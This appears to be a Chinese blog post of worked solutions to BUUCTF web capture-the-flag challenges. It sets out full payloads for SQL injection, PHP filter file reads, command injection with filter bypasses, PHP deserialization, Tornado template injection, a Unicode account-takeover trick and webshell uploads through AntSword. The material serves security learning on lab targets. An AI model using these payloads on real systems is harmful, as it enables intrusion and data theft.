吃_早餐

【CTF】buuctf web 详解（持续更新）

buuctf web

[HCTF 2018]WarmUp
[极客大挑战 2019]EasySQL
[极客大挑战 2019]Havefun
[强网杯 2019]随便注
[ACTF2020 新生赛]Include
[SUCTF 2019]EasySQL
[极客大挑战 2019]Secret File
[ACTF2020 新生赛]Exec
[极客大挑战 2019]LoveSQL
[GXYCTF2019]Ping Ping Ping
[极客大挑战 2019]Knife
[极客大挑战 2019]Http
[RoarCTF 2019]Easy Calc
[极客大挑战 2019]Upload
[极客大挑战 2019]PHP
[护网杯 2018]easy_tornado
[ACTF2020 新生赛]Upload
[极客大挑战 2019]BabySQL
[ACTF2020 新生赛]BackupFile
[HCTF 2018]admin
[极客大挑战 2019]BuyFlag
[BJDCTF2020]Easy MD5
[ZJCTF 2019]NiZhuanSiWei
[SUCTF 2019]CheckIn
[极客大挑战 2019]HardSQL
[网鼎杯 2020 青龙组]AreUSerialz
[MRCTF2020]你传你呢
[MRCTF2020]Ez_bypass
[GXYCTF2019]BabySQli
[CISCN2019 华北赛区 Day2 Web1]Hack World
[GYCTF2020]Blacklist
[网鼎杯 2018]Fakebook
[GXYCTF2019]BabyUpload
[BUUCTF 2018]Online Tool
[RoarCTF 2019]Easy Java
[GXYCTF2019]禁止套娃
[GWCTF 2019]我有一个数据库

[HCTF 2018]WarmUp

题目类型：PHP代码审计

查看源码，发现有一个source.php文件

查看此文件，出现一堆PHP代码

发现里面有一个hint.php文件，查看一下

文件里说明flag在ffffllllaaaagggg里

代码审计
is_string()：检测变量是否是字符串
isset()：检测变量是否已设置并且非 NULL
in_array(要搜索的值，要搜索的数组)：搜索数组中是否存在指定的值
mb_substr($page，n，m)：返回page中从第n位开始，到n+m位字符串的值
mb_strpos()：查找字符串在另一个字符串中首次出现的位置
urldecode()：将url编码后的字符串还原成未编码的样子

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            //如果page的值为空或者不是字符串
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
			//检测page的值是否在白名单中
            if (in_array($page, $whitelist)) {
                return true;
            }
			//返回page中从第0位开始到第一个？出现的位置，之间的值赋给page
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')//查找字符串在另一个字符串中首次出现的位置
            );
            //检验page的值是否在白名单内
            if (in_array($_page, $whitelist)) {
                return true;
            }
			//将url编码后的字符串还原成未编码的样子，然后赋值给page
            $_page = urldecode($page);
            //返回page中从第0位开始到第一个？出现的位置，之间的值赋给page
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')//查找字符串在另一个字符串中首次出现的位置
            );
            //检验page的值是否在白名单内
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
	
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "
";
    }  
?>

[极客大挑战 2019]EasySQL

题目类型：简单的SQL注入
直接万能密码

[极客大挑战 2019]Havefun

题目类型：代码审计
查看源代码

</div>
                <!--
        $cat=$_GET['cat'];
        echo $cat;
        if($cat=='dog'){
            echo 'Syc{cat_cat_cat_cat}';
        }
        -->
      <div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:black;"> Syclover @ cl4y</p></div>
      </body>
</html>

代码审计
有一个cat变量，通过get方式传参，如果cat=dog输出flag
使用构造payload：/?cat=dog

[强网杯 2019]随便注

题目类型：SQL注入
本题要有SQL语法基础：SQL通用语法

查询3时报错，说明有两个字段

1'; show columns from '1919810931114514';#
注意：表名为数字时，要用反引号包起来查询。

发现1919810931114514表中有flag

接下来的参考大佬们的方法
大佬文章里总结了三种方法，第一种比较好理解，其他两种怪我太菜看不太明白

通过 rename 先把 words 表改名为其他的表名。

把 1919810931114514 表的名字改为 words 。

给新 words 表添加新的列名 id 。

将 flag 改名为 data 。
1'; rename table words to word1; rename table '1919810931114514' to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#

[ACTF2020 新生赛]Include

题目类型：文件包含、PHP封装协议

点击链接

出现了flag.php文件，?file=flag.php 猜测文件包含漏洞，此时就要想办法查看这个文件,那怎样来查看呢，下面是我学到的一个方法

重要的知识点——PHP封装协议：
php://filter/read=convert.base64-encode/resource=xxx.php
php://filter 是php中独有的一个协议，可以作为一个中间流来处理其他流，可以进行任意文件的读取；根据名字filter，可以很容易想到这个协议可以用来过滤一些东西；使用不同的参数可以达到不同的目的和效果：
resource=<要过滤的数据流> 指定了你要筛选过滤的数据流。必选
read=<读链的筛选列表>可以设定一个或多个过滤器名称，以管道符（|）分隔。可选
write=<写链的筛选列表> 可以设定一个或多个过滤器名称，以管道符（|）分隔。可选
<；两个链的筛选列表> 任何没有以 read= 或write=作前缀的筛选器列表会视情况应用于读或写链。
php://filter与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，阻止其不执行。从而导致任意文件读取。
read=convert.base64-encode，用base64编码输出，不然会直接当做php代码执行，看不到源代码内容。

php://filter协议，用base64编码的方式来读文件flag.php；这时页面会显示出源文件flag.php经过base64编码后的内容，然后经过base64解码就可以看到flag；
payload: /?file=php://filter/read=convert.base64-encode/resource=flag.php
得到base64编码后的内容为：
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7Y2U4MzdmMmYtYjI2Mi00ZDYxLWEzOWQtOTE4OWIwYmM0ODZkfQo=

接着base64解码：


echo "Can you find out the flag?";
//flag{ce837f2f-b262-4d61-a39d-9189b0bc486d}

得到flag~~

我们再以这种方法查看一下index.php文件

<meta charset="utf8">
<?php
// 关闭错误报告
error_reporting(0);
//以get方式传参
$file = $_GET["file"];
//stristr() 函数搜索字符串在另一字符串中的第一次出现,并返回字符串的剩余部分。
//一下if语句过滤了"php://input" 、 "zip://" 、 "phar://" 、 "data:"
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
	exit('hacker!');
}
if($file){
	include($file);
}else{
	echo 'tips';
}
?>

[SUCTF 2019]EasySQL

先判断一下是数字型还是字符型，输入1

OK，有回显；然后各种试试试，都是nonono

还好，试了一下堆叠注入
爆出数据库：1;show databases;#
爆表：1;show tables;#
然后爆字段：1;show columns from FLAG;#，输入后回显Nonono.,猜测有被过滤
总之试了好多，搞得我又双叒叕不会了，唉···

下面是学习众多大佬的方法
不知道大佬们怎么猜测出查询语句为：select ".$post['query']."||flag from Flag
由于本题没有过滤*，用*查询flag中的所有字段，所以直接构造payload为：*,1

就是这么神奇

[极客大挑战 2019]Secret File

查看源码

DOCTYPE html>

<html>

<style type="text/css" >
#master {
    position:absolute;
    left:44%;
    bottom:0;
    text-align :center;
        }
        p,h1 {
                cursor: default;
        }
style>

        <head>
                <meta charset="utf-8">
                <title>蒋璐源的秘密title>
        head>

        <body style="background-color:black;"><br><br><br><br><br><br>

            <h1 style="font-family:verdana;color:red;text-align:center;">你想知道蒋璐源的秘密么？h1><br><br><br>

            <p style="font-family:arial;color:red;font-size:20px;text-align:center;">想要的话可以给你，去找吧！把一切都放在那里了！p>
            <a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found mea>
            <div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4yp>div>
        body>
html>

有这样一行代码Oh! You found me
进入这个目录查看一下

点击secret

提示查阅结束，返回上个目录，查看一下源码
此时也没有什么发现，抓个包试了试

这里提示secr3t.php，我们进入这个目录看一下

这里提示flag放在了flag.php里，进入falg.php目录
还是没有出现flag，找到了但是看不到，此时又想到了PHP的封装协议，我们用一下 [ACTF2020 新生赛]Include里面使用的方法

构造payload: /secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈！你找到我了！可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{24db537d-9661-4a16-98c8-5c9df4c936fc}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>

成功找到flag~~

[ACTF2020 新生赛]Exec

与[GXYCTF2019]Ping Ping Ping题类似，但此题更简单

需要了解的知识点
ls（英文全拼：list files）：用于显示指定工作目录下的内容（列出目前工作目录所含之文件及子目录)

cat（英文全拼：concatenate）：用于连接文件并打印到标准输出设备上。

查看此文件的目录：127.0.0.1|ls

只有一个index.php

查看上级目录127.0.0.1|ls /

查看flag：127.0.0.1|cat /flag

拿到flag~~

[极客大挑战 2019]LoveSQL

这里提示用 sqlmap 是没有灵魂的，他说没灵魂，可我就是想试一下，结果确实没有灵魂，奉劝像我一样有叛逆心理的师傅们还是不要浪费时间试了······

听话孩子的解法：
先随便输入一个万能密码

找到回显位置

试试联合查询，一直到3的时候回显正常

2和3有回显位置

输入用户名为1
爆数据库password=:1' union select 1,2,database()#

得到数据库名为geek
爆表名password=1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1#——爆出表名为geekuser
爆表名password=1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,1#——爆出表名为l0ve1ysq1
爆列名password=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #——id,username,password

爆数据：/check.php?username=1&password=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23
咦？最后这里有点像flag的一部分，怎么就出来这点？缩小一下看看

呐，不能再小了；嘻嘻，直接F12呗

拿到flag~~

[GXYCTF2019]Ping Ping Ping

具体知识点点这里
题目类型：命令执行+代码审计

提示/?ip=

输入/?ip=127.0.0.1，回显成功

显示当前的所有文件：/?ip=127.0.0.1|ls

这里查到了两个php文件
查看flag.php：?ip=127.0.0.1|cat flag.php

这里提示/?ip= fxck your space!额···fxck是什么东西，space是空格，大佬说应该是空格被过滤了

命令中空格被过滤的解决方法：
{cat,flag.txt}
cat${IFS}flag.txt
cat$IFS$9flag.txt: $IFS$9 $9指传过来的第9个参数
cat cat<>flag.txt kg=$'\x20flag.txt'&&cat$kg (\x20转换成字符串就是空格，这里通过变量的方式巧妙绕过)

 
  试试第一个方法：/?ip=127.0.0.1|{cat,flag.php}
 发现符号又被过滤了，说明{}大括号被过滤了，那第二个不能用了
 试试第三个方法/?ip=127.0.0.1|cat$IFS$9flag.php
 flag也被过滤了！ 
  不是查出来两个文件嘛，看看另一个吧
 查看index.php文件：/?ip=127.0.0.1|cat$IFS$9index.php
 发现这个PHP代码好像不太全，我们查看一下源码，出来了，下面是PHP代码 
  
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);//执行操作符 ，-c 4 表示ping的指定次数为4
  echo "";
  print_r($a);
}

?>
 
  代码审计一下，好多都被过滤了emmm；但最后有个变量a，我也不知道怎么做
 不会了，学一下大佬的方法吧 
   
    方法一：变量拼接字符串——将a的值覆盖，然后进行绕过
 构造payload：/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php
 总之就是用变量拼接成flag
 啥也没有，查看源码
 /?ip=
<pre>PING 127.0.0.1 (127.0.0.1): 56 data bytes
<?php
$flag = "flag{af15354a-6bdf-4609-b230-75bdc03e1dbf}";
?>

 拿到flag~~
  
    方法二：内联执行
 内联函数：将指定的函数体插入并取代每一处调用该函数的地方。
 反引号在linux中作为内联执行，执行输出结果。也就是说
 cat `ls` //执行ls输出 index.php 和 flag.php 。然后再执行 cat flag.php;cat index.php
 构造payload /?ip=127.0.0.1;cat$IFS$9`ls`
 
 方法三：sh命令来执行
 使用 base64 编码的方式来绕过 flag 过滤。
 加密命令
 echo “cat flag.php” | base64
 解密命令并执行
 echo Y2F0IGZsYWcucGhwCg== | base64 -d | sh
  
   
  然后用$IFS$9代替空格。
 构造payload：/?ip=127.0.0.1;echo$IFS$9Y2F0IGZsYWcucGhwCg==$IFS$9|$IFS$9base64$IFS$9-d$IFS$9|$IFS$9sh
  拿到flag~~ 
  [极客大挑战 2019]Knife 
  很明显的提示，用中国菜刀或者蚁剑，这里我使用蚁剑 
  构造payload：/? 
  打开蚁剑添加数据
 URL地址为：http://094fc751-45ef-4f6e-961d-daee474ee7b4.node4.buuoj.cn/index.php
 密码为：Syc
  
  用蚁剑查看目录
 查看根目录，找到flag
 进入flag文件夹里
 
 拿到flag~~ 
  [极客大挑战 2019]Http 
   
  查看源代码，发现有一个Secret.php
  
  进入这个访问该目录
 提示：It doesn’t come from ‘https://www.Sycsecret.com’，也就是说这个页面得来自https://www.Sycsecret.com，添加referer即可 
   
   Referer头用于告诉web服务器，用户是从哪个页面找过来的 
   
  
 提示Please use “Syclover” browser：请使用“Syclover”浏览器
 添加User-Agent:Syclover 
   
   User-Agent头用于告诉web服务器用户使用的浏览器和操作系统信息 
   
  提示No!!! you can only read this locally!!!：不! !您只能在本地阅读!!
 添加X-Forwarded-For:127.0.0.1
 拿到flag~~ 
  [RoarCTF 2019]Easy Calc 
  对我来说是一道难题，不过又学到好多
 
 查看源码
 
 抓包
 发现calc.php，访问一下
 有个黑名单 
  OKOK，上面是我所有收集到的信息，然后源码有部分也看不懂，不知道该怎么下手，甚至还不知道这是个什么类型的题目，下面开始学习大佬 
   
   知识点： 
    
    chr() 函数：从指定的 ASCII 值返回字符。 ASCII 值可被指定为十进制值、八进制值或十六进制值。八进制值被定义为带前置0，而十六进制值被定义为带前置 0x。 
    file_get_contents() 函数：把整个文件读入一个字符串中。该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持，还会使用内存映射技术来增强性能。 
    PHP的字符串解析特性：PHP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事：1.删除空白符 2.将某些字符转换为下划线（包括空格）【当waf不让你过的时候，php却可以让你过】。假如waf不允许num变量传递字母，可以在num前加个空格，这样waf就找不到num这个变量了，因为现在的变量叫“ num”，而不是“num”。但php在解析的时候，会先把空格给去掉，这样我们的代码还能正常运行，还上传了非法字符。 
    scandir() 函数：返回指定目录中的文件和目录的数组。 
    
   
  查看源码
 
 $("#content").val()相当于 document.getElementById(“content”).value; 
   
    方法一：PHP的字符串解析特性
 尝试一下/calc.php?num=phpinfo()
  
     
     PHP的字符串解析特性：PHP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事：1.删除空白符 2.将某些字符转换为下划线（包括空格）【当waf不让你过的时候，php却可以让你过】。假如waf不允许num变量传递字母，可以在num前加个空格，这样waf就找不到num这个变量了，因为现在的变量叫“ num”，而不是“num”。但php在解析的时候，会先把空格给去掉，这样我们的代码还能正常运行，还上传了非法字符。 
    
 num前加个空格：/calc.php? num=phpinfo()
 
 由于“/”被过滤了，所以我们可以使用chr(47)来进行表示，进行目录读取：
 calc.php? num=1;var_dump(scandir(chr(47)))
 
 构造：/flagg——chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)
 payload：calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
 
  
    方法二：http走私攻击
 构造：/flagg——chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)
 payload：/calc.php?num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
 
  
   
  [极客大挑战 2019]Upload 
  
 创建一个木马文件，以便后续用蚁剑链接
 文件内容为 
  GIF89a
 
 
  可绕过的后缀名检测：php,php3,php4,php5,phtml.pht 
  上传此文件，然后提示Not image!
  
  用burpsuite抓包，根据提示，修改Content-Type的内容为 image/jpeg
  
  URL地址为：/upload/a.phtml
 连接密码为：a
  
  
 找到flag文件
 
 
 拿到flag~~ 
  [极客大挑战 2019]PHP 
  具体知识点点这里
 题目类型：序列化与反序列化 
  
 这儿提示备份网站，用dirsearch扫一下后台目录
 输入：python dirsearch.py -u http://9b76aef7-3183-4da4-a909-0f95ad5b6607.node4.buuoj.cn -e php
 
 找到www.zip，访问一下
 跳出弹窗，点击下载 
  
 发现有flag.php目录
  
  
$flag = 'Syc{dog_dog_dog_dog}';
?>
 
  无用信息
 查看index.php源码，
 
 发现包含class.php文件，采用get传参select，还有个php反序列化函数unserialize() 
  查看另一个文件class.php
 
 查看源码
  
  发现有输出flag的条件，接下来代码审计 
  
include 'flag.php';
error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';
	//创建对象时触发
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
	//使用unserialize时触发
    function __wakeup(){
        $this->username = 'guest';
    }
	//对象被销毁时触发
	//如果password=100，username=admin，在执行__destruct()的时候可以获得flag
    function __destruct(){
        if ($this->password != 100) {
            echo "
NO!!!hacker!!!
";
            echo "You name is: ";
            echo $this->username;echo "
";
            echo "You password is: ";
            echo $this->password;echo "
";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "
hello my friend~~
sorry i can't give you the flag!";
            die();       
        }
    }
}
?>
 
  通过反序列化来执行destruct函数，如果password=100，username=admin，可以获得flag 
  构造序列化 
  

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin', 100);
var_dump(serialize($a));

?>

 
   
  接着执行反序列化，执行之前限制性wakeup函数，但是__wakeup函数会修改username的值，所以一个想办法绕过wakeup
 绕过方法：当成员属性数目大于实际数目时可绕过wakeup方法(CVE-2016-7124) 
   
    方法一：用序列化加%00
 private：属性被序列化的时候属性名会变成%00类名%00属性名，长度跟随属性名长度而改变。加%00的目的就是用于替代\0
 O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

 构造payload：/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
 
  
    方法二：直接url编码
 

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin', 100);
var_dump(serialize($a));
var_dump(urlencode(serialize($a)));//进行url编码，防止%00对应的不可打印字符在复制时丢失
?>
 
  
   
  [护网杯 2018]easy_tornado 
  首先出来三个链接
 查看flag.txt
 提示flag在/fllllllllllllag中
 OK，知道了第一个条件，filename=/fllllllllllllag
 查看welcome.txt
 查看hints.txt
 
 分析一下
 
 这里有两个参数，第一个参数filename，文件的名称，我们通过查看flag.txt文件知道，藏flag的文件名为fllllllllllllag；第二个参数filehash，翻译一下：文件哈希，也就是加密了 
  加密方法在第三个文件中md5(cookie_secret+md5(filename))，将cookie_secret+filename的值md5加密后的值，整体再md5加密；然后把最后的值赋给filehash 
  现在最重要的一步就是获取cookie_secret的值，这个我不会。看一下大佬们怎么做 
  在试的过程中，尝试只输入filename的值而忽略filehash，结果出来以下内容，URL变成/error?msg=Error
 我们前面忽视了第二个文件内容render。我以为只是个没用的信息，结果一查，还是个挺重要的东西，怪我见得太少 
   
   render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页 ，如果用户对render内容可控，不仅可以注入XSS代码，而且还可以通过{{}}进行传递变量和执行简单的表达式。
 Tornado是一种 Web 服务器软件的开源版本。Tornado 和现在的主流 Web 服务器框架（包括大多数 Python 的框架）有着明显的区别：它是非阻塞式服务器，而且速度相当快。 
   
  以上是我的分析过程，下面看一下大佬的解法 
  由于是python的一个模板，首先想到的就是模板注入{{}}，最终找到的位置是报错网页（随便访问一个文件是更改它的签名就可以进入），里面的参数msg。
 render是模板注入，经过测试发现过滤了。构造payload:/error?msg={{1*2}} 
   
   
   在tornado模板中，存在一些可以访问的快速对象,这里用到的是handler.settings，handler指向RequestHandler，而RequestHandler.settings又指向self.application.settings，所以handler.settings就指向RequestHandler.application.settings了，这里面就是我们的一些环境变量 
   
  构造payload/error?msg={{handler.settings}} 
  
 找到cookie_secret为6e6e371d-7445-46db-8066-46e0e25c8b7a 
  filename的值md5加密后为3bf9f6cf685a6dd8defadabfb41a03a1
 cookie_secret+filename加密后的值为9ff081746c35f525a315a313ac1a00d8
 构造payload：/file?filename=/fllllllllllllag&filehash=9ff081746c35f525a315a313ac1a00d8 
   
  [ACTF2020 新生赛]Upload 
  题目类型：文件上传，一句话木马
 
 上传一句话木马，修改后缀名为.jpg
  
  burpsuite抓包，修改后缀名
 
 知道修改为.phtml后显示上传成功
  
  使用蚁剑连接，URL地址为：http://848a2803-bdd9-4890-be0e-526c8ce1433f.node4.buuoj.cn:81/./uplo4d/71056c0c9cb12f2b7d720156da9eabf1.phtml
  
  
 
 拿到flag~~ 
  [极客大挑战 2019]BabySQL 
  题目类型：SQL注入
  
  输入用户名为admin，密码为1'
 
 由报错信息可知存在SQL注入漏洞
 
 先试一下常规注入：/check.php?username=admin&password=1' union select 1#
 
 根据报错信息猜测union 、select可能被过滤了，试一下双写绕过
 /check.php?username=admin&password=1' ununionion seselectlect 1#
 
 继续报错，URL编码试一下，然后试列数
 payload：/check.php?username=admin&password=1' ununionion seselectlect 1,2,3%23
  
  出现回显位置2和3 
  爆数据库:/check.php?username=admin&password=1' ununionion seselectlect 1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata) %23 
  
 猜测flag在ctf里
 爆表：/check.php?username=admin&password=1' ununionion seselectlect 1,2, group_concat(table_name)frfromom(infoorrmation_schema.tables) whwhereere table_schema="ctf" %23
 
 查字段名：/check.php?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag"%23
 
 /check.php?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(flag) frfromom(ctf.Flag)%23 
   
  [ACTF2020 新生赛]BackupFile 
  题目类型：备份文件 
   
    知识点 
     
     ==是不判断二者是否是同一数据类型，而===是更为严格的比较，它不仅要求二者值相等，而且还要求它们的数据类型也相同。 
     常见的备份文件后缀：.rar .zip .7z .tar .gz .bak .swp .txt .html 
     is_numeric函数用于检测变量是否为数字或数字字符串 
     intval() 函数用于获取变量的整数值 
     数字 加 字母等非数字转换 
       
       var s = ‘234string’;
 parseInt(s);　//234
 parseFloat(s); //234.0 
      
  
    
  
    解题步骤
 
 用dirsearch扫一下目录：python dirsearch.py -u 3943f78f-4c3d-4d7c-8728-9f59f4527095.node4.buuoj.cn:81 -e php
 
 访问index.php.bak
 
 出现PHP代码
 
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    //is_numeric函数用于检测变量是否为数字或数字字符串
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    //intval() 函数用于获取变量的整数值
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}


 代码审计：通过key变量get传参，要求此变量必须是数字，且取整数之后值为123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3
 取key的值为123 
  
   
  [HCTF 2018]admin 
  更多知识点及解题方法点这里
 这里有两个选项，点击register注册一个新账户
  
  下面这就算是登进来了
 
 查看源码 
  
 提示you are not admin，可能需要登录admin才能获取我们想要的东西 
  试一下弱口令，用户名admin,密码123
 结果就这么成功登进来了，所以这里警示我们密码复杂点 
  好，上面是插叙，下面才是正常解法 
  
 登录后有四个选项
 点击post 
  猜测是xss，结果一顿操作后啥也不是 
  下一个选项change password
 发现change源码中有一个地址 
  
 访问一下发现提供了网页的源码,是一个flask项目
 既然是flask项目，那就先查看一下路由
 在APP目录里找到routes.py路由文件 
  #!/usr/bin/env python
# -*- coding:utf-8 -*-

from flask import Flask, render_template, url_for, flash, request, redirect, session, make_response
from flask_login import logout_user, LoginManager, current_user, login_user
from app import app, db
from config import Config
from app.models import User
from forms import RegisterForm, LoginForm, NewpasswordForm
from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep
from io import BytesIO
from code import get_verify_code

@app.route('/code')
def get_code():
    image, code = get_verify_code()
    # 图片以二进制形式写入
    buf = BytesIO()
    image.save(buf, 'jpeg')
    buf_str = buf.getvalue()
    # 把buf_str作为response返回前端，并设置首部字段
    response = make_response(buf_str)
    response.headers['Content-Type'] = 'image/gif'
    # 将验证码字符串储存在session中
    session['image'] = code
    return response

@app.route('/')
@app.route('/index')
def index():
    return render_template('index.html', title = 'hctf')

@app.route('/register', methods = ['GET', 'POST'])
def register():

    if current_user.is_authenticated:
        return redirect(url_for('index'))

    form = RegisterForm()
    if request.method == 'POST':
        name = strlower(form.username.data)
        if session.get('image').lower() != form.verify_code.data.lower():
            flash('Wrong verify code.')
            return render_template('register.html', title = 'register', form=form)
        if User.query.filter_by(username = name).first():
            flash('The username has been registered')
            return redirect(url_for('register'))
        user = User(username=name)
        user.set_password(form.password.data)
        db.session.add(user)
        db.session.commit()
        flash('register successful')
        return redirect(url_for('login'))
    return render_template('register.html', title = 'register', form = form)

@app.route('/login', methods = ['GET', 'POST'])
def login():
    if current_user.is_authenticated:
        return redirect(url_for('index'))

    form = LoginForm()
    if request.method == 'POST':
        name = strlower(form.username.data)
        session['name'] = name
        user = User.query.filter_by(username=name).first()
        if user is None or not user.check_password(form.password.data):
            flash('Invalid username or password')
            return redirect(url_for('login'))
        login_user(user, remember=form.remember_me.data)
        return redirect(url_for('index'))
    return render_template('login.html', title = 'login', form = form)

@app.route('/logout')
def logout():
    logout_user()
    return redirect('/index')

@app.route('/change', methods = ['GET', 'POST'])
def change():
    if not current_user.is_authenticated:
        return redirect(url_for('login'))
    form = NewpasswordForm()
    if request.method == 'POST':
        name = strlower(session['name'])
        user = User.query.filter_by(username=name).first()
        user.set_password(form.newpassword.data)
        db.session.commit()
        flash('change successful')
        return redirect(url_for('index'))
    return render_template('change.html', title = 'change', form = form)

@app.route('/edit', methods = ['GET', 'POST'])
def edit():
    if request.method == 'POST':
        
        flash('post successful')
        return redirect(url_for('index'))
    return render_template('edit.html', title = 'edit')

@app.errorhandler(404)
def page_not_found(error):
    title = unicode(error)
    message = error.description
    return render_template('errors.html', title=title, message=message)

def strlower(username):
    username = nodeprep.prepare(username)
    return username
 
  然后我就没什么思路了，下面看一下大佬们的解题方法 
   
   代码审计：这里重点要注意以下strlower()函数，其中调用nodeprep.prepare函数，在代码开头有一行代码：from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep，说明nodeprep是从twisted模块中导入的，利用nodeprep.prepare函数会将unicode字符ᴬ转换成A，而A在调用一次nodeprep.prepare函数会把A转换成a。而值得注意的是strlower()自定义函数被调用了三次，分别是register、login、change，即注册、登陆、修改密码时都会被调用。 
   思路：用ᴬdmin注册，后台代码就会调用一次nodeprep.prepare函数，把用户名转换成Admin；修改一次密码，再次调用nodeprep.prepare函数，使用户名由Admin转换为admin，重新登陆，就可以得到flag 
   
  
 登陆
 
 进入之后自动将ᴬdmin转换为Admin
 然后修改密码重新登陆
 
 拿到flag~~ 
  [极客大挑战 2019]BuyFlag 
   
  
 查看源码
 
 代码审计：以post方式传参，money=100000000，password满足等于404，但是不能为数字，所以password等于404+任意字符
 使用burpsuite抓包 
  总结一下需要满足四个条件：前面提示必须是cuit的学生；以post方式传参；money=100000000；password=404a。 
  所以修改cookie里的user=0为user=1 
   
  password=404a&money=100000000，
 这里提示数字太长
 password=404a&money=1e9
  
  [BJDCTF2020]Easy MD5 
  
 查看源代码没有什么发现，抓包看一看 
  线索暗示：Hint: select * from 'admin' where password=md5($pass,true) 
  md5(string,raw) 
   
    
     
     参数 
     描述 
     
    
    
     
     string 
     必需。规定要计算的字符串。 
     
     
     raw 
     可选。规定十六进制或二进制输出格式： TRUE - 原始 16 字符二进制格式；FALSE - 默认。32 字符十六进制数 
     
    
   
  现在需要构造or来绕过password，md5(ffifdyop,true)='or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
 原sql查询语句则变为select * from user where username ='admin' and password =''or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c'即可绕过
 类似的字符串还有:md5(129581926211651571912466741651878684928,true)=\x06\xdaT0D\x9f\x8fo#\xdf\xc1'or'8
 在输入ffifdyop后，出现 
   
  查看源码
 
 这里就需要知道一个知识点：md5加密后的值开头为0E是他们的值相等
 /levels91.php?a=s878926199a&b=s155964671a
 出现以下提示
 
 我们访问levell14.php
 这里用php数组绕过，由于哈希函数无法处理php数组，在遇到数组时返回false，我们就可以利用false==false成立使条件成立。
 param1[]=1¶m2[]=2
  
  [ZJCTF 2019]NiZhuanSiWei 
  题目类型：反序列化+PHP伪协议
 这里注释提示有一个useless.php文件，访问一下
 
 发现什么都没有 
